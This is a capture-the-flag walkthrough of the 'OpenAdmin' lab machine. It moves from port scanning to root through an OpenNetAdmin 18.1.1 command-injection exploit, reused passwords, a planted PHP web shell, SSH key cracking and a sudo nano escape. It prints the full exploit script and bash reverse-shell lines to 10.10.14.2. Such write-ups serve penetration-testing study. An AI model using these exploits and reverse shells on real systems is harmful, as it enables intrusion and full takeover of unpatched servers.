Skip to content

OpenAdmin

Easy External Penetration Tester Level 1 OS Command Injection A03:2021-Injection Web Site Structure Discovery Local File Inclusion A07:2021-Identification And Authentication Failures Public Vulnerabilities Password Reuse Enumeration Hard-coded Credentials Authentication Directory Traversal Lateral Movement Weak Credentials Source Code Review Password Cracking Sudo Exploitation 

$ nmap -sV -sC 10.129.131.235
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-11 15:37 WIB
Nmap scan report for 10.129.131.235
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.61 seconds

$ gobuster dir --url http://10.129.131.235/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.131.235/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/11 16:45:09 Starting gobuster in directory enumeration mode
===============================================================
/music                (Status: 301) [Size: 316] [--> http://10.129.131.235/music/]
Progress: 388 / 87665 (0.44%)                                                    ^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2022/06/11 16:45:13 Finished
===============================================================

there are music directory, then we proceed to the login page

here we find

that is a OpenNetAdmin, and it said that the website use v18.1.1 version, so i wanna check the vulnerable using searchploit

$ searchsploit opennetadmin                                                                                       
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                       |  Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                                                                                        | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)                                                                         | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                                                                                          | php/webapps/47691.sh
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

it turns out that there is a RCE vulnerable

cat /usr/share/exploitdb/exploits/php/webapps/47691.sh

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

you can check your burp suite to make sure

$ ./47691.sh "http://10.129.131.235/ona/"

but i want to edit the code so that i can get reverse shell (optional)

$ nc -lnvp 433

#!/bin/bash

URL="http://10.129.131.235/ona/"
cmd="bash -c 'bash -i >%26 /dev/tcp/10.10.14.2/443 0>%261'"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php

<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

after all that is password for jimmy ssh

$ ssh jimmy@10.129.131.235
jimmy@10.129.131.235's password: n1nj4W4rri0R!

jimmy@openadmin:~$ netstat -natp | grep 127.0.0.1

checking the site running in /etc/apache2/sites-enabled

there is some website running inside /var/www/internal/, so to look that locally we need to make it tunnel

$ ssh jimmy@10.129.131.235 -L 52846:localhost:52846

also as jimmy we can open /var/www/internal/ and edit that folder

so it done with

jimmy@openadmin:~$ cd /var/www/internal
jimmy@openadmin:/var/www/internal$ echo "<?php system('id')?>" > tes.php
jimmy@openadmin:/var/www/internal$ # turns out that it run as joanna
jimmy@openadmin:/var/www/internal$ echo "<?php system('cat /home/joanna/user.txt')?>" > tes.php

but i want to edit the code so that i can get reverse shell (optional)

$ nc -lnvp 433

jimmy@openadmin:/var/www/internal$ echo "<?php system(\"bash -c 'bash -i >& /dev/tcp/10.10.14.2/443 0>&1'\")?>" > tes.php

then open the browser http://localhost:52846/tes.php or use curl

when it runs as joanna, we can know the ~/.ssh/id_rsa

just cat and save it locally for next ssh

$ openssl rsa -in id_rsa -out id_rsa_out
Enter pass phrase for joanna-enc:

it ask for password and we dont know the password, so try use john 

$ ssh2john id_rsa > id_rsa_hash
$ john -w=/path/to/rockyou.txt id_rsa_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (id_rsa)     
1g 0:00:00:04 DONE (2022-06-12 02:12) 0.2369g/s 2268Kp/s 2268Kc/s 2268KC/s bloodoftorii..bloodmoon99
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

$ openssl rsa -in id_rsa -out id_rsa_out
Enter pass phrase for joanna-enc: bloodninjas

it will out joanna file

ssh -i joanna joanna@10.129.131.235

after login ssh with joanna, we can use gtfobins to gain access root privilege using nano, but we need to find which file that have root access

after all, we found priv file on /opt/priv that have sudo access

$ sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0

press enter, and done, it run as root